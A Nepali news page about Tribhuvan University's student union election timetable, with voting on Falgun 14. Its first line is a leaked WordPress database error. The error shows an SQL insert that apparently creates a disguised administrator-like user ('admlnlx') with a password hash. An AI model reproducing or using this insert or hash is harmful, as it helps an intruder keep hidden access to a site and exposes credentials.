WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BIzl5LGed3IwDY4QBLYf2SFYfn5/Fp1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-17 00:04:16', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ १५ –
त्रिभुवन विश्वविद्यालयले स्वतन्त्र विद्यार्थी युनियनको निर्वाचन कार्यतालिका सार्वजनिक गरेको छ। शिक्षाध्यक्षको कार्यालय, विद्यार्थी कल्याण तथा खेलकुद निर्देशनालय अन्तर्गतको स्ववियु निर्वाचन केन्द्रीय अनुगमन तथा समन्वय समितिको शुक्रबार बसेको बैठकले फागुन १४ गते हुने स्ववियु निर्वाचन कार्यतालिका सार्वजनिक गरेको हो।
कार्यतालिकाका साथै निर्वाचन निर्देशिका र निर्वाचनमा खर्च गर्न सकिने सीमाबारेको जानकारी पनि सार्वजनिक गरिएको छ। कार्यतालिका अनुसार स्ववियु अनुगमन तथा समन्वय समितिले फागुन १ गते मतदाता सुची सार्वजनिक गर्नेछ, ५ गते उम्मेवारीदर्ता गर्ने कार्यतालिका रहेको छ। फागुन १४ गते मतदान हुनेछ। समितिका सदस्य सचिव एवम् विद्यार्थी कल्याण तथा खेलकुद निर्देशनालयका निर्देशक गंगाबहादुर थापाले त्रिवि अन्तर्गतका सबै क्याम्पस प्रमुखलाई स्ववियु निर्वाचन हुने भएकाले स्नातक र स्नातकोत्तरमा विद्यार्थी भर्ना बन्द गरेर निर्वाचनमा लाग्न निर्देशन दिएका छन्।
पढ्नुस् : स्ववियु चुनावमा गर्न हुने ८ र गर्न नहुने ६ काम,
यस्तो छ आचारसंहिता क्याम्पसहरुमा लाग्न थाल्यो स्ववियू चुनाव : वाल पेन्टिङदेखि झडपसम्म
यस्तो छ कार्यतालिका :

